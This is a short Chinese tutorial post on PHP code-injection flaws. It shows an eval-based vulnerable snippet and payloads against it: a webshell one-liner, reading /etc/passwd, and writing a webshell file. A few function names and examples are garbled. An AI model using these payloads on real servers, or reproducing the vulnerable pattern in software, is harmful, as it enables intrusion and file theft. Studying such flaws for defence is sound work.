当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞。
PHP代码执行漏洞可以将代码注入到应用中,最终到webserver去执行。该漏洞主要存在于eval()、assert()、preg_replace()、call_user_func()、array_map()以及动态函数中。
在php中:eval,assert,preg_replace(‘/*/e‘,$ret="\\1";‘,$data);
在asp中:eval,exevute.executeglobal
在jsp中:jsp中没有php中的eval函数,但是可以使用反射机制,使用基于反射机制的表达式引擎,如0GNL,SpEL,MVEL等
代码如下:
1 <?php 2 $data=$_GET[‘data‘]; 3 eval("\$ret=strtolower(\"$data\");"); 4 echo $ret; 5 ?>
构造利用
{${@eval($_POST[1])}} 一句话
{${exit(print(getcwd()))}} 获取当前工作路径
{${exit(var_dump(file_get_contents($_POST[f])))}}
读文件 f=/etc/passwd
{${exit(var_dump(file_put_contents($_POST[f], $_POST[d])))}}
写webshell f=1.php&d=1111111
原文:https://www.cnblogs.com/LeeeBoom/p/12439342.html